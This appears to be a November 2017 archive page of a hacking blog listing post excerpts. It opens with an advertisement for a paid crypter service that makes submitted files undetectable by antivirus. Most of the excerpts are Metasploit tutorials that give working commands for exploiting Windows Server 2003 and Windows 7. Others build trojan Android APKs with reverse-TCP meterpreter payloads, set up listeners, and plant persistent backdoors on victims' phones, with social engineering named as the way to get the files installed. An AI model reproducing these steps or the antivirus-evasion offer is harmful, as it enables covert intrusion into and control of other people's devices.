PRINT
PRINT
SEND MAIL
SEND MAIL

Month: November 2017

NEW TOOLS

Fud 100% services packages ready for sales

We offer a monthly Crypter service to make your files undetectable encrypted! this is how it works: You zip the files you want to encrypt and send them to our email cybersec@cybeseclabs.com then we will encrypt and make your files/file fud 100% (undetectable by any antivirus) and send them back to your email! We offer 3 packages: Standard Prenium Ultimate All those packages offer some unique futures to encrypt your file!  

Windows10

Black Window 10 v2

  Black Window Enterprise 10 Codename : Polemos Black Window 10 Enterprise is the first windows based penetration testing distribution with Linux integrated ! The system comes activated with a digital license for Windows enterprise! It supports windows apps and Linux apps, GUI and terminal apps! It comes with a tone off hacking tools plus all the tools that are included with the latest release of Cerberus Linux! It has managed to implement Cerberus os within windows. Offers the stability of a windows system…

TUTORIALS

Get Unlimited Classes from InfoSec Addicts

InfoSec Addicts is now offering Unlimited Classes access to all of the live-online classes offered each month. Classes like Network Penetration Testing, Web Application Penetration Testing, Malware Analysis, Python, PowerShell, and many more… Foundation Courses:Linux For InfoSec Professionalshttp://infosecaddicts.com/linux-for-infosec-professionals-and-linuxplus-exam-prep/Windows For InfoSec Professionals (Coming soon) Offensive Cyber Courses:Next-Level Metasploithttps://infosecaddicts.com/next-level-metasploit/Network Pentester Night Schoolhttp://infosecaddicts.com/network-pentester-night-school/Web App Pentester Night Schoolhttp://infosecaddicts.com/web-app-pentester-night-school/CyberWar – Advanced Offensive Cyber Operationshttp://infosecaddicts.com/cyberwar-advanced-offensive-cyber-operations/Exploit Developmenthttps://infosecaddicts.com/exploit-development/ Defensive Cyber Courses:Command-line Log Analysishttps://infosecaddicts.com/command-line-log-analysis/Packet Analysis/Network Forensicshttps://infosecaddicts.com/packet-analysis-network-forensics/ Malware Analysis (Coming Soon)Reverse Engineering Malware (Coming Soon) Scripting Courses:Python for InfoSec Professionalshttps://infosecaddicts.com/python-infosec-professional/PowerShell for InfoSec Professionalshttps://infosecaddicts.com/powershell-infosec-professional/Ruby for…

TUTORIALS

Amazon Promises Fix to Stop Key Service Hack

Researchers at Rhino Security Labs identified a flaw in Amazon’s Key delivery service and Cloud Cam security camera that allows a rogue courier to tamper with the camera and knock it offline, making it appear no one is entering home, when that’s not the case. Amazon Key service allows homeowners to remotely unlock and lock their front door for visitors. The service works in conjunction with Amazon’s Cloud Cam security camera. And if a user is a Prime member, they can permit Amazon couriers…

METASPLOIT TUTORIALS

How to Take Control of Windows Server 2003 Remotely by Launching a Reverse Shell

Find an Exploit Now let's search for an appropriate exploit to hack into that 2003 system. Let's type: msf> search platform:windows type:exploit This should give us the list of exploits that we can use against Windows systems. In my Metasploit system, it returned numerous exploits as seen below. Step 2Pick Your Favorite Let's choose a tried and true exploit that is almost always successful against Windows Server 2003, exploit /windows/dcerpc/ms03_026_dcom. Type: msf > use exploit/windows/dcerpc/ms03_026_dcom To get more info on this exploit, let's type:…

METASPLOIT TUTORIALS

Sending Vulnerable Shortcut Files

Open Metasploit Let's start by opening Metasploit. You can do that by using the menu system in BackTrack, or more simply, typing: bt > msfconsole You will be greeted by a screen like this. Step 2Load the Exploit In this Windows 7 hack, we will be using an exploit that Microsoft numbers as MS10-045 in their Microsoft Security Bulletins and takes advantage of a buffer overflow in the shortcut dll. Let's load it by typing: msf > use windows/ms10_046_shortcut_icon_dllloader Step 3Get the Info Now that we have it loaded…

METASPLOIT TUTORIALS

Hacking an Android Device with MSFvenom

Summary In this Lab, we are going to learn how you can hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk on victim mobile. We will demonstrate this by using following tools Kali Linux Android emulator Zipalign VMware or Virtual Box (virtual environment) Once the following setup is without any error,…

METASPLOIT TUTORIALS

Hack Android Using Kali (Remotely)

Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3Set-Up a Listener: After it loads(it will take time),…

METASPLOIT TUTORIALS

Create a Persistent Back Door in Android Using Kali Linux

Fire Up Kali and Hack an Android System: Use this guide to hack an android system on LAN. I'll be hacking on WAN, using a VM. Lets Create a backdoor by typing: msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk Now, lets set-up a Listener: msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.0.4 exploit After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up... Step 2Create a Persistent Script: Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension…

METASPLOIT TUTORIALS

How to Embed a Backdoor Connection in an Innocent-Looking PDF

The Problem Adobe has had numerous security issues with their products, including Adobe Reader, Illustrator, Flash, and others. Security vulnerabilities is partly responsible for Apple forbidding Flash from their iOS. Adobe continues to be behind the curve in security, and as a result, millions of client-side systems are vulnerable. Among the most widely used Adobe products is Reader. Nearly every computer has some version of Adobe Reader on it for reading PDFs. You probably have it, too. But, most people are unaware of the…

METASPLOIT TUTORIALS

Creating Resource Script Files

Many times, when doing a pentest/hack, we need to run a number of Metasploit commands repeatedly. These commands may be exactly the same each time, and just like scripting, we may need to automatically run multiple Metasploit commands in a single step. Metasploit has the capability to save and store these "scripts," and they can then be recalled by the script name. Metasploit calls these scripts resource files.For example, in many attacks, we need to set up a multi/handler to connect to when a…